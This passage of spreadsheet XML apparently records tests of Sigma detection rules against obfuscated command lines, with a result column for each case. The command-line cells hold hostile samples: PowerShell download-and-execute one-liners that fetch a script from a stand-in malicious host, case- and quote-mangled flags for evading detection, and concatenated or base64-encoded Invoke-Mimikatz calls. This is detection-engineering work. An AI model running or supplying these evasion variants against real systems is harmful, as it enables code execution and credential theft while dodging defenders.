          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1745" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1745" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1745" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1745" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1745" s="43" t="n"/>
      <c r="J1745" s="43" t="n"/>
      <c r="K1745" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1746" ht="15.75" customHeight="1" s="42">
      <c r="A1746" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1746" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1746" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1746" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1746" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1746" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1746" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1746" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1746" s="43" t="n"/>
      <c r="J1746" s="43" t="n"/>
      <c r="K1746" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1747" ht="15.75" customHeight="1" s="42">
      <c r="A1747" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1747" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1747" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1747" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1747" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1747" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1747" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1747" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1747" s="43" t="n"/>
      <c r="J1747" s="43" t="n"/>
      <c r="K1747" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1748" ht="15.75" customHeight="1" s="42">
      <c r="A1748" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1748" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1748" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1748" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1748" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOprOfIle /"NonInteractive" -ep Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1748" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1748" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1748" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1748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48" s="43" t="n"/>
      <c r="K1748" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1749" ht="15.75" customHeight="1" s="42">
      <c r="A1749" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1749" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1749" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1749" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1749" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /"NoProfile" -NonInteractive -EXEcuTionPOLIcY Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1749" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1749" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1749" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1749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49" s="43" t="n"/>
      <c r="K1749" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1750" ht="15.75" customHeight="1" s="42">
      <c r="A1750" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1750" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1750" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1750" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1750" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /"NoProfile" -"NonInteractive" -ep Bypass -cOmmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1750" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1750" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1750" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1750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50" s="43" t="n"/>
      <c r="K1750" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1751" ht="15.75" customHeight="1" s="42">
      <c r="A1751" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1751" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1751" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1751" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1751" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1751" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1751" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1751" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I175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51" s="43" t="n"/>
      <c r="K1751" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1752" ht="15.75" customHeight="1" s="42">
      <c r="A1752" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1752" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1752" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1752" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1752" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -"NonInteractive" -exECutIOnPOLicy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1752" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1752" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1752" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1752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52" s="43" t="n"/>
      <c r="K1752" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1753" ht="15.75" customHeight="1" s="42">
      <c r="A1753" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1753" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1753" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1753" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1753" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F1753" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1753" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1753" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1753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753" s="43" t="n"/>
      <c r="K1753" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1754" ht="15.75" customHeight="1" s="42">
      <c r="A1754" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1754" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1754" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1754" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1754" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F1754" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1754" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1754" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1754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754" s="43" t="n"/>
      <c r="K1754" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1755" ht="15.75" customHeight="1" s="42">
      <c r="A1755" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1755" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1755" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1755" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1755" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F1755" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1755" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1755" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1755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1755" s="43" t="n"/>
      <c r="K1755" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1756" ht="15.75" customHeight="1" s="42">
      <c r="A1756" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1756" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1756" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1756" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1756" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F1756" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1756" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1756" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1756" s="43" t="n"/>
      <c r="J1756" s="43" t="n"/>
      <c r="K1756" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1757" ht="15.75" customHeight="1" s="42">
      <c r="A1757" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1757" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1757" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1757" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1757" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1757" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1757" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1757" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1757" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1757" s="43" t="n"/>
      <c r="K1757" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1758" ht="15.75" customHeight="1" s="42">
      <c r="A1758" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1758" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1758" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1758" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1758" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1758" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1758" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1758" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1758" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1758" s="43" t="n"/>
      <c r="K1758" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1759" ht="15.75" customHeight="1" s="42">
      <c r="A1759" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1759" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1759" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1759" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1759" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F1759" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1759" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1759" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1759" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1759" s="43" t="n"/>
      <c r="K1759" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1760" ht="15.75" customHeight="1" s="42">
      <c r="A1760" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1760" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1760" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1760" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1760" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F1760" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1760" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1760" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1760" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1760" s="43" t="n"/>
      <c r="K1760" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1761" ht="15.75" customHeight="1" s="42">
      <c r="A1761" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1761" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1761" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1761" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1761" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F1761" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1761" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1761" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1761" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1761" s="43" t="n"/>
      <c r="K1761" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1762" ht="15.75" customHeight="1" s="42">
      <c r="A1762" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1762" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1762" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1762" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1762" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F1762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1762" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1762" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1762" s="43" t="n"/>
      <c r="K1762" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1763" ht="15.75" customHeight="1" s="42">
      <c r="A1763" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1763" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1763" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1763" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1763" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1763" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1763" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1763" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1763" s="43" t="n"/>
      <c r="K1763" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1764" ht="15.75" customHeight="1" s="42">
      <c r="A1764" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1764" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C1764" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1764" s="43" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E1764" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set str1=gather &amp; set str2=NetworkInfo.vbs &amp; call wscript.exe C:\Windows\System32\%str1%%str2%"</t>
        </is>
      </c>
      <c r="F1764" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1764" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1764" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1764" s="43" t="n"/>
      <c r="J1764" s="43" t="n"/>
      <c r="K1764" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1765" ht="15.75" customHeight="1" s="42">
      <c r="A1765" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1765" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1765" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1765" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1765" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -"NoProfile" -NonInteractive -exeCUTIonPOLIcY Bypass -CommAND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1765" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1765" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1765" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1765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65" s="43" t="n"/>
      <c r="K1765" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1766" ht="15.75" customHeight="1" s="42">
      <c r="A1766" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1766" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1766" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1766" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1766" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NOprofILE -"NonInteractive" -"ExecutionPolicy" Bypass -coMMaNd "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1766" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1766" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1766" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1766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766" s="43" t="n"/>
      <c r="K1766" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1767" ht="15.75" customHeight="1" s="42">
      <c r="A1767" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1767" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1767" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1767" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1767" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -"NoProfile" -"NonInteractive" -EXECUTiONPOLICY Bypass -"Command" "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1767" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1767" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1767" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1767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767" s="43" t="n"/>
      <c r="K1767" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1768" ht="15.75" customHeight="1" s="42">
      <c r="A1768" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1768" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1768" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1768" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1768" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1768" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1768" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1768" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1768" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1768" s="43" t="n"/>
      <c r="K1768" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1769" ht="15.75" customHeight="1" s="42">
      <c r="A1769" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1769" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1769" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1769" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1769" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F1769" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1769" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1769" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1769" s="43" t="n"/>
      <c r="J1769" s="43" t="n"/>
      <c r="K1769" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1770" ht="15.75" customHeight="1" s="42">
      <c r="A1770" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1770" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1770" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1770" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1770" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1770" s="43" t="b">
